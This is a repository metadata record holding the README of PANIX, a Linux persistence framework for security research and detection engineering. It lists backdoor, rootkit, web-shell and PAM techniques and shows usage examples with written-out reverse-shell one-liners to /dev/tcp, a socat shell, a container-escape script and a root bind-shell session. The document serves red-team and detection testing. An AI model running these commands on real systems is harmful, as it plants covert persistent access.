{"id":14350149,"url":"https://github.com/Aegrah/PANIX","last_synced_at":"2025-08-21T02:33:03.770Z","repository":{"id":248877575,"uuid":"802847910","full_name":"Aegrah/PANIX","owner":"Aegrah","description":"Customizable Linux Persistence Tool for Security Research and Detection Engineering.","archived":false,"fork":false,"pushed_at":"2024-08-25T15:50:52.000Z","size":201,"stargazers_count":316,"open_issues_count":3,"forks_count":29,"subscribers_count":7,"default_branch":"main","last_synced_at":"2024-08-25T17:01:49.081Z","etag":null,"topics":["bash","detection-engineering","linux","panix","persistence","security-research","shell","unix"],"latest_commit_sha":null,"homepage":"https://www.rgrosec.com/","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Aegrah.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-19T12:37:40.000Z","updated_at":"2024-08-25T16:02:37.000Z","dependencies_parsed_at":"2024-08-25T17:05:56.220Z","dependency_job_id":null,"html_url":"https://github.com/Aegrah/PANIX","commit_stats":null,"previous_names":["aegrah/alpha","aegrah/panix"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aegrah%2FPANIX/manifests","owner_url":"https://repos.
ecosyste.ms/api/v1/hosts/GitHub/owners/Aegrah","download_url":"https://codeload.github.com/Aegrah/PANIX/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":217116707,"owners_count":16127263,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","detection-engineering","linux","panix","persistence","security-research","shell","unix"],"created_at":"2024-08-27T04:00:38.826Z","updated_at":"2025-08-21T02:33:03.762Z","avatar_url":"https://github.com/Aegrah.png","language":"Shell","readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/user-attachments/assets/92536790-efb0-44c0-8d53-fc8b0d1e8683\" alt=\"PANIX logo\" width=\"1010\" height=\"750\"\u003e \n  \u003ch1 align=\"center\"\u003e\u003ca href=\"https://github.com/Aegrah/PANIX/\"\u003ePANIX - Persistence Against *NIX\u003c/a\u003e\u003c/h1\u003e\n\u003c/p\u003e\n\n![](https://i.imgur.com/waxVImv.png)\n\nPANIX is a powerful, modular, and highly customizable Linux persistence framework designed for security researchers, detection engineers, penetration testers, CTF enthusiasts, and more. 
Built with versatility in mind, PANIX emphasizes functionality, making it an essential tool for understanding and implementing a wide range of persistence techniques.\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Features\nPANIX provides a versatile suite of features for simulating and researching Linux persistence mechanisms.\n\n| **Feature**                      | **Description**                                                                         |**Root**|**User**|\n|----------------------------------|-----------------------------------------------------------------------------------------|--------|--------|\n| **At Job Persistence**           | Implements persistence by adding entries to system jobs.                                | ✅    | ✅     |\n| **Authorized Keys**              | Adds a public key to the authorized_keys file for SSH access.                           | ✅    | ✅     |\n| **Backdoor User**                | Creates a backdoor user with `UID=0` (root privileges).                                 | ✅    | ❌     |\n| **Backdoor System User**         | Backdoor a system user (SSH access to news/nobody).                                     | ✅    | ❌     |\n| **Backdoored /etc/passwd**       | Directly adds a malicious user entry to `/etc/passwd`.                                  | ✅    | ❌     |\n| **Backdoored /etc/init.d**       | Establishes persistence via SysVinit (`/etc/init.d`).                                   | ✅    | ❌     |\n| **Backdoored /etc/rc.local**     | Establishes persistence via run control (`/etc/rc.local`).                              | ✅    | ❌     |\n| **Bind Shell**                   | Runs a pre-compiled/LOLBin bind shell for remote access.                                | ✅    | ✅     |\n| **Capabilities Backdoor**        | Adds specific capabilities to binaries to maintain persistence.                         
| ✅    | ❌     |\n| **Cron Job Persistence**         | Sets up cron jobs to ensure persistence across reboots.                                 | ✅    | ✅     |\n| **Create User**                  | Creates a new user account on the system.                                               | ✅    | ❌     |\n| **D-Bus Backdoor**               | Creates a D-Bus service for root reverse shell access.                                  | ✅    | ❌     |\n| **Diamorphine Rootkit**          | Installs the Diamorphine Loadable Kernel Module Rootkit.                                | ✅    | ❌     |\n| **Initramfs Persistence**        | Injects a UID=0 backdoor user into initramfs on reboot.                                 | ✅    | ❌     |\n| **Git Persistence**              | Utilizes Git hooks or pagers to persist within Git repositories.                        | ✅    | ✅     |\n| **Generator Persistence**        | Leverages systemd generators to create persistent services.                             | ✅    | ❌     |\n| **GRUB Backdoor**                | Manipulates GRUB to execute a backdoor at boot.                                         | ✅    | ❌     |\n| **Malicious Container**          | Deploys a Docker container designed for host escape.                                    | ✅    | ✅     |\n| **Malicious Package**            | Installs a `DPKG/RPM` package to achieve persistence.                                   | ✅    | ❌     |\n| **NetworkManager**               | Installs a dispatcher script to persist upon network actions.                           | ✅    | ❌     |\n| **LD_PRELOAD Backdoor**          | Uses `LD_PRELOAD` to inject malicious libraries for persistence.                        | ✅    | ❌     |\n| **LKM Backdoor**                 | Loads a Loadable Kernel Module to maintain persistence.                                 | ✅    | ❌     |\n| **MOTD Backdoor**                | Alters Message of the Day (MOTD) to establish persistence.                            
  | ✅    | ❌     |\n| **Package Manager**              | Manipulates `APT/YUM/DNF` to establish persistence on usage.                            | ✅    | ❌     |\n| **PAM Persistence**              | Installs a PAM backdoor using a rogue module or pam_exec.                               | ✅    | ❌     |\n| **Password Change**              | Changes user passwords to secure backdoor accounts.                                     | ✅    | ❌     |\n| **Polkit Backdoor**              | Creates an overly permissive Polkit configuration backdoor.                             | ✅    | ❌     |\n| **Reverse Shell**                | Establishes a reverse shell (supporting multiple LOLBins).                              | ✅    | ✅     |\n| **Shell Profile Persistence**    | Modifies shell profiles to execute scripts upon user login.                             | ✅    | ✅     |\n| **SSH Key Persistence**          | Manipulates SSH keys to maintain persistent access via SSH.                             | ✅    | ✅     |\n| **Sudoers Backdoor**             | Alters the `/etc/sudoers` file to grant elevated privileges.                            | ✅    | ❌     |\n| **SUID Backdoor**                | Backdoors binaries by setting the SUID bit.                                             | ✅    | ❌     |\n| **System Binary Backdoor**       | Wraps system binaries to include backdoor functionality.                                | ✅    | ❌     |\n| **Systemd Service**              | Creates systemd services that ensure persistence on reboot.                             | ✅    | ✅     |\n| **Udev Persistence**             | Utilizes drivers to persist at the hardware interaction level.                          | ✅    | ❌     |\n| **Web Shell Persistence**        | Deploys web servers for remote access via web interfaces.                               | ✅    | ✅     |\n| **XDG Autostart**                | Employs XDG autostart directories to persist upon user login.                       
    | ✅    | ✅     |\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Support\nPANIX offers comprehensive support across various Linux distributions.\n\n| **Distribution** | **Support** | **Tested Version**                                             |\n|------------------|-----------|------------------------------------------------------------------|\n| **Debian**       | ✅       | Debian 11 \u0026 12                                                   |\n| **Ubuntu**       | ✅       | Ubuntu 22.04 (Diamorphine unavailable)                           |\n| **RHEL**         | ✅       | RHEL 9 (MOTD \u0026 Pre-OS Boot techniques unavailable)               |\n| **CentOS**       | ✅       | CentOS Stream 9 \u0026 7 (MOTD \u0026 Pre-OS Boot techniques unavailable)  |\n| **Fedora**       | ✅       | Not fully tested                                                 |\n| **Arch Linux**   | ✅       | Not fully tested                                                 |\n| **OpenSUSE**     | ✅       | Not fully tested                                                 |\n\nCustom or outdated Linux distributions may have different configurations or lack specific features, causing mechanisms to fail on untested versions. If a default command fails, use the `--custom` flag available in most features to adjust paths and commands for your environment. Review and modify the script to suit your needs if that doesn't resolve the issue.\n\n**Contributions via pull requests or issues for new features, updates, or ideas are always welcome!**\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Repository Structure\nThe PANIX repository is designed for modularity, maintainability, and ease of extension. 
Each persistence mechanism includes setup and revert scripts, simplifying management and removal.\n\n```plaintext\nPANIX/\n├── main.sh           # Core logic and argument parsing.\n├── modules/          # Persistence mechanism scripts.\n│   ├── common.sh     # Shared functions.\n│   ├── setup_*.sh    # Setup scripts.\n│   └── revert/       # Revert scripts.\n├── build.sh          # Builds the distributable script.\n├── panix.sh          # Final distributable script.\n└── README.md         # Documentation.\n```\n\n## Key Benefits\n- **Paired Setup \u0026 Revert**: Every `setup_*.sh` has a corresponding `revert_*.sh`, ensuring easy removal of persistence mechanisms.\n- **Modular Design**: Easily modify existing modules or add new ones without affecting the core script.\n- **Simple Expansion**: To add new functionality:\n  1. Create a new `setup_*.sh` in `modules/`.\n  2. Add a corresponding `revert_*.sh` in `modules/revert/`.\n  3. Update `main.sh` to include the new scripts.\n  4. Update `common.sh` to include the module in the help menu.\n  5. 
Run `build.sh` to generate the updated `panix.sh`.\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Getting Started\nGetting PANIX up and running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.1.0) and executing it:\n```\ncurl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash\n```\nOr download it and execute it manually:\n```\n# Download through curl or wget\ncurl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh -o panix.sh\nwget https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh -O panix.sh\n\n# Grant execution permissions and execute the script.\nchmod +x panix.sh\n./panix.sh\n```\n\nExecuting the script will either show the `root` or `user` help menu, depending on the privileges the current user has.\n\n```\npanix@panix-demo:~$ sudo ./panix.sh\n __\n|__)  /\\  |\\ | | \\_/\n|    /~~\\ | \\| | / \\\n\n@RFGroenewoud\n\nRoot User Options:\n\n  --at                   At job persistence\n  --authorized-keys      Add public key to authorized keys\n  --backdoor-user        Create backdoor user\n  --backdoor-system-user Create backdoor system user\n  --bind-shell           Execute backgrounded bind shell\n  --cap                  Add capabilities persistence\n  --create-user          Create a new user\n  --cron                 Cron job persistence\n  --dbus                 D-Bus service persistence\n  --generator            Generator persistence\n  --git                  Git hook/pager persistence\n  --grub                 GRUB bootloader persistence\n  --initd                SysV Init (init.d) persistence\n  --initramfs            Initramfs persistence \n  --ld-preload           LD_PRELOAD backdoor persistence\"\n  --lkm                  Loadable Kernel Module (LKM) persistence\n  --malicious-container  Docker container with host escape\"\n  --malicious-package    Build and Install a package for persistence (DPKG/RPM)\n  
--motd                 Message Of The Day (MOTD) persistence (not available on RHEL derivatives)\n  --network-manager      NetworkManager dispatcher script persistence\n  --package-manager      Package Manager persistence (APT/YUM/DNF)\n  --pam                  Pluggable Authentication Module (PAM) persistence (backdoored PAM \u0026 pam_exec)\n  --passwd-user          Add user to /etc/passwd directly\n  --password-change      Change user password\n  --polkit               Allow pkexec as any user through Polkit\n  --rc-local             Run Control (rc.local) persistence\n  --reverse-shell        Reverse shell persistence (supports multiple LOLBins)\"\n  --rootkit              Diamorphine (LKM) rootkit persistence \n  --shell-profile        Shell profile persistence\n  --ssh-key              SSH key persistence\n  --sudoers              Sudoers persistence\n  --suid                 SUID persistence\n  --system-binary        System binary persistence\n  --systemd              Systemd service persistence\n  --udev                 Udev (driver) persistence\n  --web-shell            Web shell persistence (PHP/Python)\n  --xdg                  XDG autostart persistence\n  --revert               Revert changes made by PANIX' default options\n  --mitre-matrix         Display the MITRE ATT\u0026CK Matrix for PANIX\n  --quiet (-q)           Quiet mode (no banner)\n```\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Examples\nThe script should be largely self-explanatory; this section nevertheless shows a few examples of how to work with PANIX.\n\n## Help Menu\nEvery persistence mechanism has a separate help menu:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --udev --help\nUsage: ./panix.sh --udev [OPTIONS]\n--examples                              Display command examples\n-default                               Use default udev settings\n  --ip \u003cip\u003e                               Specify IP address\n  --port \u003cport\u003e                           Specify port 
number\n  --sedexp | --at | --cron | --systemd    Specify the mechanism to use\n--custom                                Use custom udev settings\n  --command \u003ccommand\u003e                     Specify custom command\n  --path \u003cpath\u003e                           Specify custom path\n--help|-h                               Show this help message\n```\n\nEvery persistence mechanism also has an `--examples` flag that shows default and custom examples, aiding in crafting the command that works for you.\n\n```\nruben@ubuntu2204:~$ ./panix.sh --git --examples\nExamples:\n--default:\n./panix.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager\n\n--custom:\n./panix.sh --git --custom --command \"(nohup setsid /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10.10/1337 0\u003e\u00261' \u003e /dev/null 2\u003e\u00261 \u0026) \u0026\" --path \"gitdir/.git/hooks/pre-commit\" --hook\n\n./panix.sh --git --custom --command \"nohup setsid /bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/10.10.10.10/1337 0\u003e\u00261' \u003e /dev/null 2\u003e\u00261 \u0026 ${PAGER:-less}\" --path \"~/.gitconfig --pager\"\n```\n\n## Execution\nMost of the persistence mechanisms are very simple, and will (hopefully) not require much explanation. For example, systemd persistence can be set up simply through executing:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --systemd --default --ip 10.10.10.10 --port 1337\nService file created successfully!\nTimer file created successfully!\nCreated symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.\n[+] Systemd service persistence established!\n```\nWhen setting up a persistence mechanism, the script will let you know whether it worked, and in cases where information is needed to work with the persistence mechanism, additional information is provided. 
For example, the bind shell mechanism:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --bind-shell --default --architecture x64\n[+] Bind shell binary /tmp/bd64 created and executed in the background.\n[+] The bind shell is listening on port 9001.\n[+] To interact with it from a different system, use: nc -nv \u003cIP\u003e 9001\n[+] Bind shell persistence established!\n```\nThis allows you to interact with the bind shell:\n```\n❯ nc -nv 192.168.211.130 9001\n(UNKNOWN) [192.168.211.130] 9001 (?) open\nwhoami\nroot\n```\nThe same goes for mechanisms that have additional built-in features, such as the Docker persistence mechanism with its built-in root host escape:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --malicious-container --ip 192.168.211.131 --port 330\n[+] Building 10.4s (9/9) FINISHED                                                                                                                                            docker:default\n =\u003e [internal] load build definition from Dockerfile                                                                                                                                   0.0s\n =\u003e =\u003e transferring dockerfile: 722B                                                                                                                                                   0.0s\n =\u003e [internal] load metadata for docker.io/library/alpine:latest                                                                                                                       2.1s\n =\u003e [internal] load .dockerignore                                                                                                                                                      0.0s\n =\u003e =\u003e transferring context: 2B                                                                                                                                                        0.0s\n =\u003e [1/5] FROM 
docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0                                                                 0.8s\n =\u003e =\u003e resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0                                                                 0.0s\n =\u003e =\u003e sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 1.85kB / 1.85kB                                                                                         0.0s\n =\u003e =\u003e sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76 528B / 528B                                                                                             0.0s\n =\u003e =\u003e sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd9414687 1.47kB / 1.47kB                                                                                         0.0s\n =\u003e =\u003e sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99 3.62MB / 3.62MB                                                                                         0.4s\n =\u003e =\u003e extracting sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e99                                                                                              0.2s\n =\u003e [2/5] RUN apk add --no-cache bash socat sudo util-linux procps                                                                                                                     4.4s\n =\u003e [3/5] RUN adduser -D lowprivuser                                                                                                                                                   0.6s\n =\u003e [4/5] RUN echo '#!/bin/bash' \u003e /usr/local/bin/entrypoint.sh \u0026\u0026 echo 'while true; do /bin/bash -c \"socat exec:\\\"/bin/bash\\\",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330\"  0.8s\n =\u003e [5/5] RUN echo 
'#!/bin/bash' \u003e /usr/local/bin/escape.sh \u0026\u0026 echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' \u003e\u003e /usr/local/bin/escape.sh \u0026\u0026 chmod +x /usr/local/bin/escape.sh \u0026\u0026 ec  0.8s\n =\u003e exporting to image                                                                                                                                                                 0.6s\n =\u003e =\u003e exporting layers                                                                                                                                                                0.6s\n =\u003e =\u003e writing image sha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d248790                                                                                           0.0s\n =\u003e =\u003e naming to docker.io/library/malicious-container                                                                                                                                 0.0s\n86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef\n[+] Persistence through malicious Docker container complete.\n[+] To escape the container with root privileges, run '/usr/local/bin/escape.sh'.\n```\nThis output shows exactly how to escape the container and gain access to the host:\n```\n❯ nc -nvlp 330\nlistening on [any] 330 ...\nconnect to [192.168.211.131] from (UNKNOWN) [192.168.211.130] 43400\n86ce6b00e872:/$ /usr/local/bin/escape.sh\n/usr/local/bin/escape.sh\nroot@ubuntu2204:~#\n```\n\n## Revert Mechanism\nPANIX can clean up after itself through the `--revert` command, both for separate modules:\n\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --revert rootkit\n\n######################### [+] Reverting rootkit module... ######################### \n\n[+] Sending 'kill -63 0' to unload the rootkit module... \n[+] Signal sent successfully.\n[+] Identifying loaded rootkit kernel modules in /dev/shm/.rk...\n[+] Unloading rootkit rkit... 
\n[+] Kernel module 'rkit' unloaded successfully.\n[+] Rootkit rkit unloaded successfully.\n[+] Removing kernel module files from /dev/shm/.rk...\n[+] Removed file: /dev/shm/.rk/restore_rkit.ko\n[+] Removed directory: /dev/shm/.rk\n[+] Removing downloaded files in /tmp...\n[-] Directory not found: /tmp/diamorphine\n[-] File not found: /tmp/diamorphine.zip\n[+] Removed file: /tmp/diamorphine.tar\n[-] Directory not found: /tmp/Diamorphine.git\n[+] Reloading kernel modules...\n[+] Kernel modules reloaded successfully.\n```\n\nAnd for all modules:\n```\nruben@ubuntu2204:~$ sudo ./panix.sh --revert all\n\n[+] Running full reversion with --revert-all...\n[+] Reverting all modules...\n\n######################### [+] Reverting revert_at... #########################\n\nError: 'at' binary is not present. Cannot revert 'at' jobs.\n[-] Failed to revert revert_at. Exit Code: 1\n\n######################### [+] Reverting revert_authorized_keys... #########################\n\n[-] Backup file /root/.ssh/authorized_keys.bak not found. No changes made.\n[+] revert_authorized_keys reverted successfully.\n\n######################### [+] Reverting revert_backdoor_user... #########################\n\n[+] No backdoor users found.\n[+] revert_backdoor_user reverted successfully.\n\n######################### [+] Reverting revert_bind_shell... #########################\n\n[+] Searching for bind shell processes and killing them if present...\n[+] revert_bind_shell reverted successfully.\n\n[...]\n\n[+] Reversion of all modules complete.\n```\n\n## MITRE ATT\u0026CK Matrix\nPANIX has a built-in MITRE ATT\u0026CK matrix that displays the techniques and sub-techniques available. 
\n\n```\nruben@ubuntu2204:~$ ./panix.sh --mitre-matrix\n\nMITRE ATT\u0026CK Matrix - Persistence Techniques Supported by PANIX\n\nPersistence Method        Technique Name                           Technique ID    Sub-technique Name                       Sub-technique ID     URL                                                                   \n-------------------       --------------                           -------------   -----------------                        ---------------      ---------------------------------------------                         \n--at                      Scheduled Task                           T1053           At                                       T1053.002            https://attack.mitre.org/techniques/T1053/002\n--authorized-keys         Account Manipulation                     T1098           SSH Authorized Keys                      T1098.004            https://attack.mitre.org/techniques/T1098/004\n--backdoor-user           Create Account                           T1136           Local Account                            T1136.001            https://attack.mitre.org/techniques/T1136/001\n--backdoor-system-user    Account Manipulation                     T1098           SSH Authorized Keys                      T1098.004            https://attack.mitre.org/techniques/T1098/004\n--bind-shell              Command and Scripting Interpreter        T1059           Unix Shell                               T1059.004            https://attack.mitre.org/techniques/T1059/004\n--cap                     Abuse Elevation Control Mechanism        T1548           N/A                                      N/A                  https://attack.mitre.org/techniques/T1548\n--create-user             Create Account                           T1136           Local Account                            T1136.001            https://attack.mitre.org/techniques/T1136/001\n--cron                    Scheduled Task                           T1053           Cron         
                            T1053.003            https://attack.mitre.org/techniques/T1053/003\n--dbus                    Create or Modify System Process          T1543           N/A                                      N/A                  https://attack.mitre.org/techniques/T1543\n--generator               Create or Modify System Process          T1543           Systemd Service                          T1543.002            https://attack.mitre.org/techniques/T1543/002\n--git                     Event Triggered Execution                T1546           N/A                                      N/A                  https://attack.mitre.org/techniques/T1546\n--grub                    Pre-OS Boot                              T1542           N/A                                      N/A                  https://attack.mitre.org/techniques/T1542\n--initd                   Boot or Logon Initialization Scripts     T1037           N/A                                      N/A                  https://attack.mitre.org/techniques/T1037\n--initramfs               Pre-OS Boot                              T1542           N/A                                      N/A                  https://attack.mitre.org/techniques/T1542\n--ld-preload              Hijack Execution Flow                    T1574           Dynamic Linker Hijacking                 T1574.006            https://attack.mitre.org/techniques/T1574/006\n--lkm                     Boot or Logon Autostart Execution        T1547           Kernel Modules and Extensions            T1547.006            https://attack.mitre.org/techniques/T1547/006\n--malicious-container     Escape to Host                           T1610           N/A                                      N/A                  https://attack.mitre.org/techniques/T1610\n--malicious-package       Event Triggered Execution                T1546           Installer Packages                       T1546.016            https://attack.mitre.org/techniques/T1546/016\n--motd  
                  Boot or Logon Initialization Scripts     T1037           N/A                                      N/A                  https://attack.mitre.org/techniques/T1037\n--network-manager         Event Triggered Execution                T1546           N/A                                      N/A                  https://attack.mitre.org/techniques/T1546\n--package-manager         Event Triggered Execution                T1546           Installer Packages                       T1546.016            https://attack.mitre.org/techniques/T1546/016\n--pam                     Modify Authentication Process            T1556           Pluggable Authentication Modules         T1556.003            https://attack.mitre.org/techniques/T1556/003\n--passwd-user             Account Manipulation                     T1098           N/A                                      N/A                  https://attack.mitre.org/techniques/T1098\n--password-change         Account Manipulation                     T1098           N/A                                      N/A                  https://attack.mitre.org/techniques/T1098\n--polkit                  Modify Authentication Process            T1556           N/A                                      N/A                  https://attack.mitre.org/techniques/T1556\n--rc-local                Boot or Logon Initialization Scripts     T1037           RC Scripts                               T1037.004            https://attack.mitre.org/techniques/T1037/004\n--reverse-shell           Command and Scripting Interpreter        T1059           Unix Shell                               T1059.004            https://attack.mitre.org/techniques/T1059/004\n--rootkit                 Rootkit                                  T1014           N/A                                      N/A                  https://attack.mitre.org/techniques/T1014\n--shell-profile           Event Triggered Execution                T1546           Unix Shell Configuration 
Modification    T1546.004            https://attack.mitre.org/techniques/T1546/004\n--ssh-key                 Account Manipulation                     T1098           SSH Authorized Keys                      T1098.004            https://attack.mitre.org/techniques/T1098/004\n--sudoers                 Abuse Elevation Control Mechanism        T1548           Sudo and Sudo Caching                    T1548.003            https://attack.mitre.org/techniques/T1548/003\n--suid                    Abuse Elevation Control Mechanism        T1548           Setuid and Setgid                        T1548.001            https://attack.mitre.org/techniques/T1548/001\n--system-binary           Compromise Host Software Binary          T1554           N/A                                      N/A                  https://attack.mitre.org/techniques/T1554\n--systemd                 Create or Modify System Process          T1543           Systemd Service                          T1543.002            https://attack.mitre.org/techniques/T1543/002\n--udev                    Event Triggered Execution                T1546           Udev Rules                               T1546.017            https://attack.mitre.org/techniques/T1546/017\n--web-shell               Server Software Component                T1505           Web Shell                                T1505.003            https://attack.mitre.org/techniques/T1505/003\n--xdg                     Boot or Logon Autostart Execution        T1547           XDG Autostart Entries                    T1547.013            https://attack.mitre.org/techniques/T1547/013                     \n\nLegend:\nTechnique: High-level MITRE ATT\u0026CK technique.\nSub-Technique: Specific sub-technique under a high-level technique.\nN/A: No specific sub-technique defined for this method.\nURL: Link to the official MITRE ATT\u0026CK page for further details.\n```\n\n![](https://i.imgur.com/waxVImv.png)\n# Publications and Resources\nPublications in which PANIX 
is leveraged:\n\n- [Linux Detection Engineering - A Primer on Persistence Mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)  \n- [Linux Detection Engineering - A Sequel on Persistence Mechanisms](https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms)\n- [Linux Detection Engineering - A Continuation on Persistence Mechanisms](https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms)\n- [Linux Detection Engineering - Approaching the Summit on Persistence Mechanisms](https://www.elastic.co/security-labs/approaching-the-summit-on-persistence)\n- [Linux Detection Engineering - The Grand Finale on Linux Persistence Mechanisms](https://www.elastic.co/security-labs/the-grand-finale-on-linux-persistence)\n\nFeel free to check out my socials for updates on (Linux) security research.\n\n\u003cp align=\"left\"\u003e\n\u003ca href=\"https://twitter.com/RFGroenewoud\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-Twitter%20-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"Twitter\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://www.linkedin.com/in/ruben-groenewoud/\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-LinkedIn-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"LinkedIn\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://www.rgrosec.com/\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-Blog-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"Blog\"/\u003e\u003c/a\u003e\n\u003ca href=\"https://github.com/Aegrah\"\u003e\u003cimg src=\"https://img.shields.io/badge/%E2%9C%A8-GitHub-0a0a0a.svg?style=flat\u0026colorA=0a0a0a\" alt=\"GitHub\"/\u003e\u003c/a\u003e\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Share\nBy sharing [PANIX](https://github.com/Aegrah/PANIX), you can assist others in testing and improving their security posture and support the development of new detection capabilities in Linux security.\n\n[![GitHub Repo 
stars](https://img.shields.io/badge/share%20on-reddit-red?logo=reddit)](https://reddit.com/submit?url=https://github.com/Aegrah/PANIX\u0026title=Persistence%20Against%20UNIX%20\\(PANIX\\))\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-hacker%20news-orange?logo=ycombinator)](https://news.ycombinator.com/submitlink?u=https://github.com/Aegrah/PANIX)\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-twitter-03A9F4?logo=twitter)](https://twitter.com/share?url=https://github.com/Aegrah/PANIX\u0026text=Persistence%20Against%20UNIX%20\\(PANIX\\))\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-facebook-1976D2?logo=facebook)](https://www.facebook.com/sharer/sharer.php?u=https://github.com/Aegrah/PANIX)\n[![GitHub Repo stars](https://img.shields.io/badge/share%20on-linkedin-3949AB?logo=linkedin)](https://www.linkedin.com/shareArticle?url=https://github.com/Aegrah/PANIX\u0026title=Persistence%20Against%20UNIX%20\\(PANIX\\))\n\n![](https://i.imgur.com/waxVImv.png)\n\n# Disclaimer\nPANIX is intended for authorized security testing and research purposes only. Misuse of this tool for malicious activities is not condoned and is entirely at the user's own risk. By using PANIX, you agree that you are responsible for your own actions. Just don't do stupid stuff.\n","funding_links":[],"categories":["Shell","Recently Updated","Detection Testing"],"sub_categories":["[Aug 26, 2024](/content/2024/08/26/README.md)","Linux"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAegrah%2FPANIX","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAegrah%2FPANIX","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAegrah%2FPANIX/lists"}
